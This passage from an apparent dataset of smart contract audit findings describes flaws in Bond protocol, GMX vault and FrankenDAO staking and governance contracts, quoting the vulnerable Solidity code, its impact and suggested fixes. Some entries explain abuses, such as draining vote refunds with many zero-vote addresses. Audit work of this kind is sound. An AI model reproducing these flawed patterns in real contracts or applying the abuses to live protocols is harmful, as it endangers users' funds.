_mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\n",Implement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\n,"The create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. As such, the users will not obtain any discount from the protocol when using the create function.","```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n" +`BondAggregator.findMarketFor` Function Will Break In Certain Conditions,medium,"`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. This will cause the entire for-loop to ""break"" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\n",Consider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.,"The find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. The market makers affected by this issue will lose the opportunity to sell their bond tokens.","```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n" +Auctioneer Cannot Be Removed From The Protocol,medium,"If a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\n","In the event that a whitelisted Auctioneer is found to be vulnerable and has been actively exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.",```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n +Debt Decay Faster Than Expected,medium,"The debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n","When computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\n","When the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\n","```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n" +BondBaseSDA.setDefaults doesn't validate inputs,medium,"BondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checkings, as you can see. Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will be not possible to create new market.\\nOr you can provide `minDebtBuffer` to be 100% ot 0% that will break logic of market closing.",Add input validation.,Can't create new market or market logic will be not working as designed.,```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n +BondAggregator.liveMarketsBy eventually will revert because of block gas limit,medium,"BondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls(when all markets are not live) and at most 4 * `marketCounter` external calls(when all markets are live and owner matches. This all consumes a lot of gas, even that is called from view function. And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.",Remove not active markets or some start and end indices to functions.,Functions will always revert and whoever depends on it will not be able to get information.,```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n +meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is called,medium,"When BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.",Update meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.,Tuning logic will not be completed when needed.,"```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n" +DnGmxJuniorVaultManager#_rebalanceBorrow logic is flawed and could result in vault liquidation,high,"DnGmxJuniorVaultManager#_rebalanceBorrow fails to rebalance correctly if only one of the two assets needs a rebalance. In the case where one assets increases rapidly in price while the other stays constant, the vault may be liquidated.\\n```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n\\nThe logic above is used to determine what assets to borrow using the flashloan. If the rebalance amount is under a threshold then the assetAmount is set equal to zero. The first check `if (btcAssetAmount == 0 && ethAssetAmount == 0) return;` is a short circuit that returns if neither asset is above the threshold. The third check `else if (btcAssetAmount == 0 || ethAssetAmount == 0)` is the point of interest. Since we short circuit if both are zero then to meet this condition exactly one asset needs to be rebalanced. The logic that follows is where the error is. In the comments it indicates that it needs to enter with the non-zero amount token but the actual logic reflects the opposite. If `btcAssetAmount == 0` it actually tries to enter with wBTC which would be the zero amount asset.\\nThe result of this can be catastrophic for the vault. If one token increases in value rapidly while the other is constant the vault will only ever try to rebalance the one token but because of this logical error it will never actually complete the rebalance. If the token increase in value enough the vault would actually end up becoming liquidated.",Small change to reverse the logic and make it correct:\\n```\\n- if (btcAssetAmount == 0) {\\n+ if (btcAssetAmount != 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n,"Vault is unable to rebalance correctly if only one asset needs to be rebalanced, which can lead to the vault being liquidated",```\\n // If both eth and btc swap amounts are not beyond the threshold then no flashloan needs to be executed | case 1\\n if (btcAssetAmount == 0 && ethAssetAmount == 0) return;\\n\\n if (repayDebtBtc && repayDebtEth) {\\n // case where both the token assets are USDC\\n // only one entry required which is combined asset amount for both tokens\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n assets[0] = address(state.usdc);\\n amounts[0] = (btcAssetAmount + ethAssetAmount);\\n } else if (btcAssetAmount == 0 || ethAssetAmount == 0) {\\n // Exactly one would be true since case-1 excluded (both false) | case-2\\n // One token amount = 0 and other token amount > 0\\n // only one entry required for the non-zero amount token\\n assets = new address[](1);\\n amounts = new uint256[](1);\\n\\n if (btcAssetAmount == 0) {\\n assets[0] = (repayDebtBtc ? address(state.usdc) : address(state.wbtc));\\n amounts[0] = btcAssetAmount;\\n } else {\\n assets[0] = (repayDebtEth ? address(state.usdc) : address(state.weth));\\n amounts[0] = ethAssetAmount;\\n }\\n```\\n +DnGmxJuniorVaultManager#_totalAssets current implementation doesn't properly maximize or minimize,medium,"The maximize input to DnGmxJuniorVaultManager#_totalAssets indicates whether to either maximize or minimize the NAV. Internal logic of the function doesn't accurately reflect that because under some circumstances, maximize = true actually returns a lower value than maximize = false.\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n\\nTo maximize the estimate for the NAV of the vault underlying debt should minimized and value of held assets should be maximized. Under the current settings there is a mix of both of those and the function doesn't consistently minimize or maximize. Consider when NAV is ""maxmized"". Under this scenario the value of when estimated the GlpPrice is minimized. This minimizes the value of both the borrowedGlp (debt) and of the unhedgedGlp (assets). The result is that the NAV is not maximized because the value of the assets are also minimized. In this scenario the GlpPrice should be maximized when calculating the assets and minimized when calculating the debt. The reverse should be true when minimizing the NAV. Slippage requirements are also applied incorrectly when adjusting borrowValueGlp. The current implementation implies that if the debt were to be paid back that the vault would repay their debt for less than expected. When paying back debt the slippage should imply paying more than expected rather than less, therefore the slippage should be added rather than subtracted.","To properly maximize the it should assume the best possible rate for exchanging it's assets. Likewise to minimize it should assume it's debt is a large as possible and this it encounters maximum possible slippage when repaying it's debt. I recommend the following changes:\\n```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n- _getGlpPrice(state, !maximize)\\n+ _getGlpPrice(state, maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n- if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n+ if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS + state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n",DnGmxJuniorVaultManager#_totalAssets doesn't accurately reflect NAV. Since this is used when determining critical parameters it may lead to inaccuracies.,"```\\n uint256 unhedgedGlp = (state.unhedgedGlpInUsdc + dnUsdcDepositedPos).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // calculate current borrow amounts\\n (uint256 currentBtc, uint256 currentEth) = _getCurrentBorrows(state);\\n uint256 totalCurrentBorrowValue = _getBorrowValue(state, currentBtc, currentEth);\\n\\n // add negative part to current borrow value which will be subtracted at the end\\n // convert usdc amount into glp amount\\n uint256 borrowValueGlp = (totalCurrentBorrowValue + dnUsdcDepositedNeg).mulDivDown(\\n PRICE_PRECISION,\\n _getGlpPrice(state, !maximize)\\n );\\n\\n // if we need to minimize then add additional slippage\\n if (!maximize) unhedgedGlp = unhedgedGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n if (!maximize) borrowValueGlp = borrowValueGlp.mulDivDown(MAX_BPS - state.slippageThresholdGmxBps, MAX_BPS);\\n```\\n" +`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.,high,"`Staking.unstake()` doesn't decrease the original voting power that was used in `Staking.stake()`.\\nWhen users stake/unstake the underlying NFTs, it calculates the token voting power using getTokenVotingPower() and increases/decreases their voting power accordingly.\\n```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nBut `getTokenVotingPower()` uses some parameters like `monsterMultiplier` and `baseVotes` and the output would be changed for the same `tokenId` after the admin changed these settings.\\nCurrently, `_stake()` and `_unstake()` calculates the token voting power independently and the below scenario would be possible.\\nAt the first time, `baseVotes = 20, monsterMultiplier = 50`.\\nA user staked a `FrankenMonsters` and his voting power = 10 here.\\nAfter that, the admin changed `monsterMultiplier = 60`.\\nWhen a user tries to unstake the NFT, the token voting power will be `20 * 60 / 100 = 12` here.\\nSo it will revert with uint underflow here.\\nAfter all, he can't unstake the NFT.",I think we should add a mapping like `tokenVotingPower` to save an original token voting power when users stake the token and decrease the same amount when they unstake.,`votesFromOwnedTokens` might be updated wrongly or users can't unstake for the worst case because it doesn't decrease the same token voting power while unstaking.,"```\\n function getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n" +Staking#_unstake removes votes from wrong person if msg.sender != owner,high,"Staking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them. The issue is that even when msg.sender != owner the votes are removed from msg.sender instead of owner. The result is that the owner keeps their votes and msg.sender loses theirs. This could be abused to hijack or damage voting.\\n```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n\\nStaking#_unstake allows any msg.sender to unstake tokens for any owner that has approved them.\\n```\\nuint lostVotingPower;\\nfor (uint i = 0; i < numTokens; i++) {\\n lostVotingPower += _unstakeToken(_tokenIds[i], _to);\\n}\\n\\nvotesFromOwnedTokens[msg.sender] -= lostVotingPower;\\n// Since the delegate currently has the voting power, it must be removed from their balance\\n// If the user doesn't delegate, delegates(msg.sender) will return self\\ntokenVotingPower[getDelegate(msg.sender)] -= lostVotingPower;\\ntotalTokenVotingPower -= lostVotingPower;\\n```\\n\\nAfter looping through _unstakeToken all accumulated votes are removed from msg.sender. The problem with this is that msg.sender is allowed to unstake tokens for users other than themselves and in these cases they will lose votes rather than the user who owns the token.\\nExample: User A and User B both stake tokens and have 10 votes each. User A approves User B to unstake their tokens. User B calls unstake for User A. User B is msg.sender and User A is owner. The votes should be removed from owner but instead are removed from msg.sender. The result is that after unstaking User B has a vote balance of 0 while still having their locked token and User B has a vote balance of 10 and their token back. Now User B is unable to unstake their token because their votes will underflow on unstake, permanently trapping their NFT.",Remove the ability for users to unstake for other users,Votes are removed incorrectly if msg.sender != owner. By extension this would forever trap msg.sender tokens in the contract.,```\\naddress owner = ownerOf(_tokenId);\\nif (msg.sender != owner && !isApprovedForAll[owner][msg.sender] && msg.sender != getApproved[_tokenId]) revert NotAuthorized();\\n```\\n +castVote can be called by anyone even those without votes,medium,"Governance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes 